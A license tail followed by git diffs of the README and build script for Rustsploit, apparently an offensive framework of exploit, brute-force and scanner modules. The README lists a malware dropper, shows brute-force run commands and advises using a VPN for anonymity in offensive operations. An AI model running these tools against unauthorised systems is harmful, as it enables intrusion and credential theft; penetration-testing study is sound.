receives a license from the original licensors, to run, modify and
propagate that work, subject to this License. You are not responsible
for enforcing compliance by third parties with this License.
An "entity transaction" is a transaction transferring control of an
organization, or substantially all assets of one, or subdividing an
organization, or merging organizations. If propagation of a covered
work results from an entity transaction, each party to that
transaction who receives a copy of the work also receives whatever
licenses to the work the party's predecessor in interest had or could
give under the previous paragraph, plus a right to possession of the
Corresponding Source of the work from the predecessor in interest, if
the predecessor has it or can get it with reasonable efforts.
You may not impose any further restrictions on the exercise of the
rights granted or affirmed under this License. For example, you may
not impose a license fee, royalty, or other charge for exercise of
rights granted under this License, and you may not initiate litigation
(including a cross-claim or counterclaim in a lawsuit) alleging that
any patent claim is infringed by making, using, selling, offering for
sale, or importing the Program or any portion of it.
11. Patents.
A "contributor" is a copyright holder who authorizes use under this
License of the Program or a work on which the Program is based. The
work thus licensed is called the contributor's "contributor version".
A contributor's "essential patent claims" are all patent claims
owned or controlled by the contributor, whether already acquired or
hereafter acquired, that would be infringed by some manner, permitted
by this License, of making, using, or selling its contributor version,
but do not include claims that would be infringed only as a
consequence of further modification of the contributor version. For
purposes of this definition, "control" includes the right to grant
patent sublicenses in a manner consistent with the requirements of
this License.
Each contributor grants you a non-exclusive, worldwide, royalty-free
patent license under the contributor's essential patent claims, to
make, use, sell, offer for sale, import and otherwise run, modify and
propagate the contents of its contributor version.
In the following three paragraphs, a "patent license" is any express
agreement or commitment, however denominated, not to enforce a patent
(such as an express permission to practice a patent or covenant not to
sue for patent infringement). To "grant" such a patent license to a
party means to make such an agreement or commitment not to enforce a
patent against the party.
If you convey a covered work, knowingly relying on a patent license,
and the Corresponding Source of the work is not available for anyone
to copy, free of charge and under the terms of this License, through a
publicly available network server or other readily accessible means,
then you must either (1) cause the Corresponding Source to be so
available, or (2) arrange to deprive yourself of the benefit of the
patent license for this particular work, or (3) arrange, in a manner
consistent with the requirements of this License, to extend the patent
license to downstream recipients. "Knowingly relying" means you have
actual knowledge that, but for the patent license, your conveying the
covered work in a country, or your recipient's use of the covered work
in a country, would infringe one or more identifiable patents in that
country that you have reason to believe are valid.
If, pursuant to or in connection with a single transaction or
arrangement, you convey, or propagate by procuring conveyance of, a
covered work, and grant a patent license to some of the parties
receiving the covered work authorizing them to use, propagate, modify
or convey a specific copy of the covered work, then the patent license
you grant is automatically extended to all recipients of the covered
work and works based on it.
A patent license is "discriminatory" if it does not include within
the scope of its coverage, prohibits the exercise of, or is
conditioned on the non-exercise of one or more of the rights that are
specifically granted under this License. You may not convey a covered
work if you are a party to an arrangement with a third party that is
in the business of distributing software, under which you make payment
to the third party based on the extent of your activity of conveying
the work, and under which the third party grants, to any of the
parties who would receive the covered work from you, a discriminatory
patent license (a) in connection with copies of the covered work
conveyed by you (or copies made from those copies), or (b) primarily
for and in connection with specific products or compilations that
contain the covered work, unless you entered into that arrangement,
or that patent license was granted, prior to 28 March 2007.
Nothing in this License shall be construed as excluding or limiting
any implied license or other defenses to infringement that may
otherwise be available to you under applicable patent law.
12. No Surrender of Others' Freedom.
If conditions are imposed on you (whether by court order, agreement or
otherwise) that contradict the conditions of this License, they do not
excuse you from the conditions of this License. If you cannot convey a
covered work so as to satisfy simultaneously your obligations under this
License and any other pertinent obligations, then as a consequence you may
not convey it at all. For example, if you agree to terms that obligate you
to collect a royalty for further conveying from those to whom you convey
the Program, the only way you could satisfy both those terms and this
License would be to refrain entirely from conveying the Program.
13. Use with the GNU Affero General Public License.
Notwithstanding any other provision of this License, you have
permission to link or combine any covered work with a work licensed
under version 3 of the GNU Affero General Public License into a single
combined work, and to convey the resulting work. The terms of this
License will continue to apply to the part which is the covered work,
but the special requirements of the GNU Affero General Public License,
section 13, concerning interaction through a network will apply to the
combination as such.
14. Revised Versions of this License.
The Free Software Foundation may publish revised and/or new versions of
the GNU General Public License from time to time. Such new versions will
be similar in spirit to the present version, but may differ in detail to
address new problems or concerns.
Each version is given a distinguishing version number. If the
Program specifies that a certain numbered version of the GNU General
Public License "or any later version" applies to it, you have the
option of following the terms and conditions either of that numbered
version or of any later version published by the Free Software
Foundation. If the Program does not specify a version number of the
GNU General Public License, you may choose any version ever published
by the Free Software Foundation.
If the Program specifies that a proxy can decide which future
versions of the GNU General Public License can be used, that proxy's
public statement of acceptance of a version permanently authorizes you
to choose that version for the Program.
Later license versions may give you additional or different
permissions. However, no additional obligations are imposed on any
author or copyright holder as a result of your choosing to follow a
later version.
15. Disclaimer of Warranty.
THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
16. Limitation of Liability.
IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
SUCH DAMAGES.
17. Interpretation of Sections 15 and 16.
If the disclaimer of warranty and limitation of liability provided
above cannot be given local legal effect according to their terms,
reviewing courts shall apply local law that most closely approximates
an absolute waiver of all civil liability in connection with the
Program, unless a warranty or assumption of liability accompanies a
copy of the Program in return for a fee.
END OF TERMS AND CONDITIONS
How to Apply These Terms to Your New Programs
If you develop a new program, and you want it to be of the greatest
possible use to the public, the best way to achieve this is to make it
free software which everyone can redistribute and change under these terms.
To do so, attach the following notices to the program. It is safest
to attach them to the start of each source file to most effectively
state the exclusion of warranty; and each file should have at least
the "copyright" line and a pointer to where the full notice is found.
<one line to give the program's name and a brief idea of what it does.>
Copyright (C) <year> <name of author>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <https://www.gnu.org/licenses/>.
Also add information on how to contact you by electronic and paper mail.
If the program does terminal interaction, make it output a short
notice like this when it starts in an interactive mode:
<program> Copyright (C) <year> <name of author>
This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
This is free software, and you are welcome to redistribute it
under certain conditions; type `show c' for details.
The hypothetical commands `show w' and `show c' should show the appropriate
parts of the General Public License. Of course, your program's commands
might be different; for a GUI interface, you would use an "about box".
You should also get your employer (if you work as a programmer) or school,
if any, to sign a "copyright disclaimer" for the program, if necessary.
For more information on this, and how to apply and follow the GNU GPL, see
<https://www.gnu.org/licenses/>.
The GNU General Public License does not permit incorporating your program
into proprietary programs. If your program is a subroutine library, you
may consider it more useful to permit linking proprietary applications with
the library. If this is what you want to do, use the GNU Lesser General
Public License instead of this License. But first, please read
<https://www.gnu.org/licenses/why-not-lgpl.html>.
+174 -63
View File
@@ -1,15 +1,15 @@
# Rustsploit 🛠️
# Rustsploit
Modular offensive tooling for embedded targets, written in Rust and inspired by RouterSploit/Metasploit. Rustsploit ships an interactive shell, a command-line runner, rich proxy support, and an ever-growing library of exploits, scanners, and credential modules for routers, cameras, appliances, and general network services.
Modular offensive tooling for embedded targets, written in Rust and inspired by RouterSploit/Metasploit. Rustsploit ships an interactive shell, a command-line runner, and an ever-growing library of exploits, scanners, and credential modules for routers, cameras, appliances, and general network services.
![Screenshot](https://github.com/s-b-repo/rustsploit/raw/main/preview.png)
![Screenshot](https://github.com/s-b-repo/rustsploit/raw/main/testing.png)
- 📚 **Developer Docs:** [Full guide covering module lifecycle, proxy logic, shell flow, and dispatcher](https://github.com/s-b-repo/rustsploit/blob/main/docs/readme.md)
- 💬 **Interactive Shell:** Ergonomic command palette with shortcuts (e.g., `f1 ssh`, `u exploits/heartbleed`, `go`)
- 🌐 **Proxy Smartness:** Supports HTTP(S), SOCKS4/4a/5 (with hostname resolution), validation, and automatic rotation
- 🧱 **IPv4/IPv6 Ready:** Credential modules and sockets normalize targets so both address families work out-of-the-box
- **Developer Docs:** [Full guide covering module lifecycle,shell flow, and dispatcher](https://github.com/s-b-repo/rustsploit/blob/main/docs/readme.md)
- **Interactive Shell:** Ergonomic command palette with shortcuts (e.g., `f1 ssh`, `u exploits/heartbleed`, `go`)
- **IPv4/IPv6 Ready:** Credential modules and sockets normalize targets so both address families work out-of-the-box
---
@@ -22,43 +22,54 @@ Modular offensive tooling for embedded targets, written in Rust and inspired by
5. [Interactive Shell Walkthrough](#interactive-shell-walkthrough)
6. [CLI Usage](#cli-usage)
7. [API Server Mode](#api-server-mode)
8. [Proxy Workflow](#proxy-workflow)
9. [How Modules Are Discovered](#how-modules-are-discovered)
10. [Contributing](#contributing)
11. [Credits](#credits)
8. [How Modules Are Discovered](#how-modules-are-discovered)
9. [Contributing](#contributing)
10. [Credits](#credits)
---
## Highlights
- **Auto-discovered modules:** `build.rs` indexes `src/modules/**` so new code drops in without manual registration
- **Interactive shell with color and shortcuts:** Quick command palette, target/module state tracking, alias commands (`help/?`, `modules/m`, `run/go`, etc.)
- **Ergonomic proxy system:** Load lists, validate availability, choose concurrency/timeouts, and rotate automatically on failure
- **Comprehensive credential tooling:** FTP(S), SSH, Telnet, POP3(S), SMTP, RDP, RTSP, SNMP, L2TP, MQTT, Fortinet brute force modules with IPv6 and TLS support where applicable
- **Enhanced Telnet module:** Full IAC (Interpret As Command) negotiation, advanced error classification, verbose quick-check mode, robust buffer handling
- **Improved RDP module:** Streaming failover for large password files (>150MB), comprehensive error classification, multiple security level support (NLA/TLS/RDP/Negotiate/Auto)
- **Framework-level honeypot detection:** Automatic detection before scans using 200 common ports (warns if 11+ ports open)
- **Advanced target normalization:** Supports IPv4, IPv6, hostnames, URLs, CIDR notation with comprehensive validation
- **Exploit coverage:** Apache Tomcat, Abus security cameras, Ivanti Connect Secure, TP-Link, Zabbix, Avtech cameras, Spotube, OpenSSH race condition, and more
- **Scanners & utilities:** Port scanner, ping sweep, SSDP discovery, HTTP title grabber, DNS recursion tester, HTTP method scanner, StalkRoute traceroute (root)
- **Payload generation:** Batch malware dropper (`narutto_dropper`), BAT payload generator, custom credential checkers
- **Readable output:** Colored prompts, structured status messages, optional verbose logs and result persistence
- **REST API Server:** Launch a secure API server with authentication, rate limiting, IP tracking, and dynamic key rotation
- **Security hardened:** Comprehensive input validation, path traversal protection, length limits, and memory-safe operations throughout
- **Honeypot detection:** Framework-level automatic detection before module execution to warn about potentially deceptive targets
- **Enhanced target handling:** Advanced normalization supporting IPv4, IPv6 (with brackets), hostnames, URLs, CIDR notation, and port extraction
- **Auto-discovered modules:** `build.rs` indexes `src/modules/**` so new code drops in without manual registration
- **Interactive shell with color and shortcuts:** Quick command palette, target/module state tracking, alias commands (`help/?`, `modules/m`, `run/go`, etc.)
- **Comprehensive credential tooling:** FTP(S), SSH, Telnet, POP3(S), SMTP, RDP, RTSP, SNMP, L2TP, MQTT, Fortinet brute force modules with IPv6 and TLS support where applicable
- **Enhanced Telnet module:** Full IAC (Interpret As Command) negotiation, advanced error classification, verbose quick-check mode, robust buffer handling
- **Improved RDP module:** Streaming failover for large password files (>150MB), comprehensive error classification, multiple security level support (NLA/TLS/RDP/Negotiate/Auto)
- **L2TP/IPsec Bruteforce:** Multi-platform support (strongswan, xl2tpd, NetworkManager, rasdial, networksetup), proper IPsec Phase 1/2 handling
- **Framework-level honeypot detection:** Automatic detection before scans using 200 common ports (warns if 11+ ports open)
- **Advanced target normalization:** Supports IPv4, IPv6, hostnames, URLs, CIDR notation with comprehensive validation
- **Exploit coverage:** GNU inetutils-telnetd Auth Bypass (CVE-2026-24061), Apache Tomcat, Abus security cameras, Ivanti Connect Secure, TP-Link, Zabbix, Avtech cameras, Spotube, OpenSSH race condition, and more
- **Scanners & utilities:** Port scanner, ping sweep, SSDP discovery, HTTP title grabber, DNS recursion tester, HTTP method scanner, StalkRoute traceroute (root), **Directory Bruteforcer**, **Sequential Fuzzer**
- **Payload generation:** Batch malware dropper (`narutto_dropper`), BAT payload generator, custom credential checkers
- **Readable output:** Colored prompts, structured status messages, optional verbose logs and result persistence
- **REST API Server:** Launch a secure API server with authentication, rate limiting, IP tracking, and dynamic key rotation
- **Security hardened:** Comprehensive input validation, path traversal protection, length limits, and memory-safe operations throughout
- **Honeypot detection:** Framework-level automatic detection before module execution to warn about potentially deceptive targets
- **Enhanced target handling:** Advanced normalization supporting IPv4, IPv6 (with brackets), hostnames, URLs, CIDR notation, and port extraction
---
## Module Catalog
**🚀 New Features:**
- **CLI Error Handling** - Added proper warning messages for invalid flag combinations:
- `⚠ Warning` when `-m` is used without `-t` (suggests proper usage)
- ` Note` when `-t` is used without `-m` (target available in shell)
- Error when `--harden` is used without `--api`
- Helpful usage hints printed for common mistakes
- **Improved CLI Experience** - Added `--list-modules` to browse tools without entering the shell, and `--verbose` for detailed operation logs. Fuzzy matching now suggests corrections for typos (e.g., `sample_xploit` -> `sample_exploit`).
- **Colored CLI output** - Warnings in yellow, hints in cyan, success in green
**📚 Documentation:**
- Updated developer guide with v0.5.0 changes
- Added CLI error handling examples
Rustsploit ships categorized modules under `src/modules/`, automatically exposed to the shell/CLI. A non-exhaustive snapshot:
| Category | Highlights |
|----------|------------|
| `creds/generic` | FTP anonymous & FTPS brute force, SSH brute force, SSH user enumeration (timing attack), SSH password spray, **Telnet brute force (with IAC negotiation)**, POP3(S) brute force, SMTP brute force, RTSP brute force (path + header bruting), **RDP auth-only brute (streaming mode, multiple security levels)**, **MQTT brute force**, SNMP community string brute force, L2TP/IPsec brute force, Fortinet SSL VPN brute force |
| `exploits/*` | Apache Tomcat (CVE-2025-24813 RCE, CatKiller CVE-2025-31650), TP-Link VN020 / WR740N DoS, Abus camera CVE-2023-26609 variants, Ivanti Connect Secure stack buffer overflow, Zabbix 7.0.0 SQLi, Avtech CVE-2024-7029, Spotube zero-day, OpenSSH 9.8p1 race condition, Uniview password disclosure, ACTi camera RCE, Flowise CVE-2025-59528 RCE, HTTP/2 Rapid Reset DoS, Jenkins LFI, PAN-OS Auth Bypass, Heartbleed, **SSHPWN Framework** (SFTP symlink/setuid/traversal, SCP injection/DoS, Session env injection) |
| `scanners` | Port scanner (TCP/UDP/SYN/ACK), ping sweep (ICMP/TCP/UDP/SYN/ACK), SSDP M-SEARCH enumerator, HTTP title fetcher, HTTP method scanner, DNS recursion/amplification tester, StalkRoute traceroute (firewall evasion), **SSH scanner** (banner grabbing, CIDR support) |
| `creds/generic` | FTP anonymous & FTPS brute force (5 operation modes, JSON config), SSH brute force, SSH user enumeration (timing attack), SSH password spray, **Telnet brute force (with IAC negotiation)**, POP3(S) brute force, SMTP brute force, RTSP brute force (path + header bruting), **RDP auth-only brute (streaming mode, multiple security levels)**, **MQTT brute force**, SNMP community string brute force, **L2TP/IPsec brute force (multi-platform)**, Fortinet SSL VPN brute force |
| `exploits/*` | GNU inetutils-telnetd Auth Bypass (CVE-2026-24061), Apache Tomcat (CVE-2025-24813 RCE, CatKiller CVE-2025-31650), TP-Link VN020 / WR740N DoS, **TP-Link Tapo C200 CVE-2021-4045**, Abus camera CVE-2023-26609 variants, Ivanti Connect Secure stack buffer overflow, Zabbix 7.0.0 SQLi, Avtech CVE-2024-7029, Spotube zero-day, OpenSSH 9.8p1 race condition, Uniview password disclosure, ACTi camera RCE, Flowise CVE-2025-59528 RCE, HTTP/2 Rapid Reset DoS, Jenkins LFI, PAN-OS Auth Bypass, Heartbleed, **React2Shell CVE-2025-55182**, **SSHPWN Framework** (SFTP symlink/setuid/traversal, SCP injection/DoS, Session env injection) |
| `scanners` | Port scanner (TCP/UDP/SYN/ACK), ping sweep (ICMP/TCP/UDP/SYN/ACK), SSDP M-SEARCH enumerator, HTTP title fetcher, HTTP method scanner, DNS recursion/amplification tester, StalkRoute traceroute (firewall evasion), **SSH scanner** (banner grabbing, CIDR support), **Directory Bruteforcer (recursive, extensions)**, **Sequential Fuzzer (multi-encoding, custom charsets)** |
| `payloadgens` | `narutto_dropper`, BAT payload generator |
| `lists` | RTSP wordlists, telnet default credentials, and helper files |
@@ -70,12 +81,51 @@ Run `modules` or `find <keyword>` in the shell for the authoritative list.
### Requirements
```
**Debian/Ubuntu/Kali:**
```bash
sudo apt update
sudo apt install freerdp2-x11 # Required for the RDP brute force module
sudo apt install pkg-config libssl-dev freerdp2-x11 libdbus-1-dev # Required for RDP and Bluetooth modules
```
**Arch Linux:**
```bash
sudo pacman -S pkgconf openssl freerdp
```
**Gentoo:**
```bash
sudo emerge dev-libs/openssl dev-util/pkgconf net-misc/freerdp
```
**Fedora/RHEL:**
```bash
sudo dnf install pkgconf-pkg-config openssl-devel freerdp
```
### Installing Rust & Cargo
**General (Recommended for all Linux/macOS):**
```bash
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
source $HOME/.cargo/env
```
**Debian/Ubuntu/Kali:**
```bash
sudo apt install rustc cargo
```
**Arch Linux:**
```bash
sudo pacman -S rust
```
**Fedora/RHEL:**
```bash
sudo dnf install rust cargo
```
Ensure Rust and Cargo are installed (https://www.rust-lang.org/tools/install).
### Clone + Build
@@ -91,10 +141,26 @@ cargo build
cargo run
```
### Install (optional)
### Global Installation (Run from Terminal)
```
To run `rustsploit` from anywhere in your terminal:
**Option 1: Cargo Install (Easiest)**
```bash
cargo install --path .
rustsploit
```
**Option 2: Manually Build Release Binary**
```bash
# 1. Build optimized release version
cargo build --release
# 2. Move binary to your path (e.g., /usr/local/bin)
sudo cp target/release/rustsploit /usr/local/bin/
# 3. Run from anywhere
rustsploit
```
---
@@ -164,8 +230,8 @@ Environment variables are written with 0600 permissions so secrets stay private.
- **Advanced Target Normalization**: The framework now supports:
- IPv4: `192.168.1.1`, `192.168.1.1:8080`
- IPv6: `::1`, `[::1]`, `[::1]:8080`, `2001:db8::1`
- Hostnames: `.com`, `.com:443`
- URLs: `http://.com:8080` (extracts host:port)
- Hostnames: `example.com`, `example.com:443`
- URLs: `http://example.com:8080` (extracts host:port)
- CIDR notation: `192.168.1.0/24`, `2001:db8::/32`
All targets are validated for security (DoS prevention, path traversal protection, format validation).
@@ -189,6 +255,23 @@ Environment variables are written with 0600 permissions so secrets stay private.
- Proper CONNECT packet construction with variable-length encoding
- CONNACK response parsing and error classification
- **SSH User Enumeration**:
- Timing attack-based user enumeration (inspired by CVE-2018-15473)
- Statistical analysis with configurable samples and thresholds
- Distinguishes valid/invalid users based on authentication time differences
- **Directory Bruteforcer**:
- High-performance recursive directory scanning
- Custom wordlists with extension appending
- Smart status code filtering and size anomaly detection
- Interactive wizard for easy configuration
- **Sequential Fuzzer**:
- Targeted fuzzing for URLs, headers, and body parameters
- Multiple encoding types (URL, Double URL, Hex, Base64, etc.)
- Custom charsets (SQL, Traversal, Command Injection)
- Iterative generation for exhaustive coverage
## Interactive Shell Walkthrough
The shell tracks current module, target, and proxy state. All commands are case-insensitive and support aliases:
@@ -203,26 +286,28 @@ find find <kw> | f1 <kw> Search modules by keyword
use use <path> | u <path> Select module (ex: u exploits/heartbleed)
set target set target <value> Set current target (IPv4/IPv6/hostname)
run run | go Execute current module (honors proxy mode)
proxy_load proxy_load [file] | pl Load proxies from file (HTTP/HTTPS/SOCKS)
proxy_on/off proxy_on | pon / ... Toggle proxy usage
proxy_test proxy_test | ptest Validate proxies (URL, timeout, concurrency)
show_proxies show_proxies | proxies View proxy status
exit exit | quit | q Leave shell
```
session:
Example session:
```
```text
rsf> f1 ssh
rsf> u creds/generic/ssh_bruteforce
rsf> set target 10.10.10.10
rsf> pl data/proxies.txt # prompts if omitted
rsf> pon
rsf> proxy_test # optional validation / filtering
rsf> go
```
If proxy mode is enabled, Rustsploit rotates through validated proxies, falls back to direct mode only after exhaustion, and politely reports successes or errors.
### Command Chaining
Execute multiple commands in a single line using the `&` separator:
```text
rsf> u creds/generic/ssh_bruteforce & set target 10.10.10.10 & go
rsf> f1 ssh & u creds/generic/ssh_bruteforce & set target 192.168.1.1
```
This is useful for scripting quick workflows or batching common operations together.
---
@@ -241,6 +326,20 @@ cargo run -- --command scanner --module port_scanner --target 192.168.1.1
cargo run -- --command creds --module ssh_bruteforce --target 192.168.1.1
```
### Global Flags
- `--list-modules`: Print all available modules and exit.
- `--verbose (-v)`: Enable detailed logging (useful for debugging).
- `--output-format <text|json>`: Control output format (default: text).
```bash
# List all modules
cargo run -- --list-modules
# Run with verbose logging
cargo run -- -m exploits/sample_exploit -t 127.0.0.1 -v
```
Any module exposed to the shell can be called here. Use the `modules` shell command or browse `src/modules/**` for canonical names.
---
@@ -301,14 +400,26 @@ Authorization: ApiKey your-api-key-here
curl -H "Authorization: Bearer your-api-key" http://localhost:8080/api/modules
```
- **`GET /api/module/:category/:name`** - Get details for a specific module
```
curl -H "Authorization: Bearer your-api-key" http://localhost:8080/api/module/exploits/sample_exploit
```
- **`POST /api/run`** - Execute a module on a target
```
curl -X POST -H "Authorization: Bearer your-api-key" \
-H "Content-Type: application/json" \
-d '{"module": "scanners/port_scanner", "target": "192.168.1.1"}' \
http://localhost:8080/api/run
```
- **`POST /api/validate`** - Validate parameters without execution
```
curl -X POST -H "Authorization: Bearer your-api-key" \
-H "Content-Type: application/json" \
-d '{"module": "scanners/port_scanner", "target": "192.168.1.1"}' \
http://localhost:8080/api/validate
```
- **`GET /api/status`** - Get API server status and statistics
```
curl -H "Authorization: Bearer your-api-key" http://localhost:8080/api/status
@@ -330,7 +441,7 @@ Authorization: ApiKey your-api-key-here
curl -H "Authorization: Bearer your-api-key" http://localhost:8080/api/auth-failures
```
### telnet config
### telnet config example
```
{
"port": 23,
@@ -399,7 +510,9 @@ Log entries include:
- Module execution results
- Resource cleanup operations
### API Workflow
**Note:** API responses now include `request_id`, `timestamp`, and `duration_ms` for better observability.
### Example API Workflow
```
# 1. Start the API server
@@ -426,20 +539,18 @@ curl -H "Authorization: Bearer my-secret-key" http://localhost:8080/api/ips
---
## Proxy Workflow
## Private Internet Recommendations
Rustsploit treats proxy lists as first-class citizens:
The built-in proxy system has been removed in favor of system-level VPN solutions which offer far superior reliability and security for offensive operations.
- Accepts HTTP, HTTPS, SOCKS4, SOCKS4a, SOCKS5, and SOCKS5h entries
- Loads from user-supplied files, skipping invalid lines with reasons
- Optional connectivity test prompts allow tuning:
- Test URL (default `https://.com`)
- Timeout (seconds)
- Max concurrent checks
- Keeps only working proxies when validation is requested
- Rotates at run time; if all proxies fail, reverts to direct host attempts automatically
We strongly recommend **[Mullvad VPN](https://mullvad.net)** for the following reasons:
- **No Registration:** Account numbers are generated without email or personal data.
- **Privacy Focus:** Proven no-logs policy, audited infrastructure, and anonymous payment options (Cash, Crypto).
- **WireGuard Support:** High-performance, low-latency tunneling essential for scanning and brute-forcing.
- **Port Forwarding:** (Note: check current availability) historically supported for reverse shells.
- **Linux CLI:** Excellent command-line client that integrates well with headless setups.
Environment variables (`ALL_PROXY`, `HTTP_PROXY`, `HTTPS_PROXY`) are managed transparently per attempt.
To use Rustsploit with Mullvad (or any VPN), simply connect the VPN on your host system before running the tool. All traffic will naturally route through the tunnel.
---
@@ -447,11 +558,11 @@ Environment variables (`ALL_PROXY`, `HTTP_PROXY`, `HTTPS_PROXY`) are managed tra
Rustsploit scans `src/modules/` recursively during build. Each module should expose:
```
```rust
pub async fn run(target: &str) -> anyhow::Result<()>;
```
Optional interactive entry points (`run_interactive`) can coexist. Module paths are referenced relative to `src/modules/`, for :
Optional interactive entry points (`run_interactive`) can coexist. Module paths are referenced relative to `src/modules/`, for example:
- File: `src/modules/exploits/sample_exploit.rs`
- Shell path: `exploits/sample_exploit`
+43 -132
View File
@@ -1,18 +1,12 @@
use std::collections::HashSet;
use std::env;
use std::fs::{self, File};
use std::fs::File;
use std::io::{Read, Write};
use std::path::Path;
use regex::Regex;
use walkdir::WalkDir;
/// Build script that generates module dispatchers for exploits, scanners, and creds.
///
/// This script:
/// - Scans `src/modules/{category}/` directories recursively
/// - Finds all `.rs` files (excluding `mod.rs`) that export `pub async fn run(target: &str)`
/// - Generates dispatch functions that support both short names and full paths
/// - Creates deterministic, sorted output for better maintainability
fn main() {
// Tell Cargo to rerun this build script if module directories change
println!("cargo:rerun-if-changed=src/modules/exploits");
@@ -34,21 +28,13 @@ fn main() {
}
}
/// Generates a dispatch function for a module category.
///
/// # Arguments
/// * `root` - Root directory to scan (e.g., "src/modules/exploits")
/// * `out_file` - Output filename (e.g., "exploit_dispatch.rs")
/// * `mod_prefix` - Module path prefix (e.g., "crate::modules::exploits")
/// * `category_name` - Category name for error messages (e.g., "Exploit")
fn generate_dispatch(
root: &str,
out_file: &str,
mod_prefix: &str,
category_name: &str,
) -> Result<(), Box<dyn std::error::Error>> {
let out_dir = env::var("OUT_DIR")
.map_err(|_| "OUT_DIR environment variable not set")?;
let out_dir = env::var("OUT_DIR").map_err(|_| "OUT_DIR environment variable not set")?;
let dest_path = Path::new(&out_dir).join(out_file);
let root_path = Path::new(root);
@@ -56,63 +42,42 @@ fn generate_dispatch(
return Err(format!("Module directory '{}' does not exist", root).into());
}
// Collect all module mappings (using HashSet to avoid duplicates)
let mut mappings = HashSet::new();
visit_dirs(root_path, "".to_string(), &mut mappings)?;
let mappings = find_modules(root_path)?;
// Sort for deterministic output
let mut sorted_mappings: Vec<_> = mappings.into_iter().collect();
sorted_mappings.sort_by(|a, b| a.0.cmp(&b.0));
if mappings.is_empty() {
eprintln!("⚠️ Warning: No modules found in {}", root);
let mut file = File::create(&dest_path)?;
writeln!(file, "// Auto-generated by build.rs - DO NOT EDIT MANUALLY\n")?;
// Generate AVAILABLE_MODULES constant for runtime discovery
writeln!(file, "/// List of all available modules in this category.")?;
writeln!(file, "pub const AVAILABLE_MODULES: &[&str] = &[")?;
for (key, _) in &sorted_mappings {
writeln!(file, " \"{}\",", key)?;
}
writeln!(file, "];\n")?;
// Sort mappings for deterministic output
let mut sorted_mappings: Vec<_> = mappings.iter().collect();
sorted_mappings.sort_by_key(|(key, _)| key);
writeln!(file, "pub async fn dispatch(module_name: &str, target: &str) -> anyhow::Result<()> {{")?;
writeln!(file, " match module_name {{")?;
// Generate the dispatch function
let mut file = File::create(&dest_path)
.map_err(|e| format!("Failed to create {}: {}", dest_path.display(), e))?;
writeln!(
file,
"// Auto-generated by build.rs - DO NOT EDIT MANUALLY\n"
)?;
writeln!(
file,
"/// Dispatches to the appropriate {} module based on module name.\n\
/// Supports both short names (e.g., 'port_scanner') and full paths (e.g., 'scanners/port_scanner').",
category_name.to_lowercase()
)?;
writeln!(
file,
"pub async fn dispatch(module_name: &str, target: &str) -> anyhow::Result<()> {{\n match module_name {{"
)?;
// Generate match arms for each module (supporting both short and full names)
for (key, mod_path) in &sorted_mappings {
let short_key = key.rsplit('/').next().unwrap_or(key);
let mod_code_path = mod_path.replace("/", "::");
// Support both short name and full path
if short_key == *key {
// No subdirectory, only short name
writeln!(
file,
r#" "{k}" => {{ {p}::{m}::run(target).await? }},"#,
k = key,
m = mod_code_path,
p = mod_prefix
k = key, m = mod_code_path, p = mod_prefix
)?;
} else {
// Has subdirectory, support both short and full
writeln!(
file,
r#" "{short}" | "{full}" => {{ {p}::{m}::run(target).await? }},"#,
short = short_key,
full = key,
m = mod_code_path,
p = mod_prefix
short = short_key, full = key, m = mod_code_path, p = mod_prefix
)?;
}
}
@@ -122,92 +87,38 @@ fn generate_dispatch(
r#" _ => anyhow::bail!("{} module '{{}}' not found.", module_name),"#,
category_name
)?;
writeln!(file, " }}\n Ok(())\n}}")?;
println!("✅ Generated {} with {} modules", out_file, sorted_mappings.len());
Ok(())
}
/// Recursively visits directories to find all module files.
///
/// # Arguments
/// * `dir` - Directory to scan
/// * `prefix` - Current path prefix (e.g., "generic" or "camera/acti")
/// * `mappings` - Set to store (full_path, module_path) tuples
fn visit_dirs(
dir: &Path,
prefix: String,
mappings: &mut HashSet<(String, String)>,
) -> Result<(), Box<dyn std::error::Error>> {
// Compile regex once for better performance
// Matches: pub async fn run(target: &str) or pub async fn run(_target: &str)
let sig_re = Regex::new(r"pub\s+async\s+fn\s+run\s*\(\s*[^)]*:\s*&str\s*\)")
.map_err(|e| format!("Failed to compile regex: {}", e))?;
/// Finds all valid modules recursively using WalkDir
fn find_modules(root: &Path) -> Result<HashSet<(String, String)>, Box<dyn std::error::Error>> {
let mut mappings = HashSet::new();
let sig_re = Regex::new(r"pub\s+async\s+fn\s+run\s*\(\s*[^)]*:\s*&str\s*\)")?;
if !dir.is_dir() {
return Ok(());
}
let mut entries: Vec<_> = fs::read_dir(dir)?
.collect::<Result<Vec<_>, _>>()?;
// Sort entries for deterministic processing
entries.sort_by_key(|e| e.file_name());
for entry in entries {
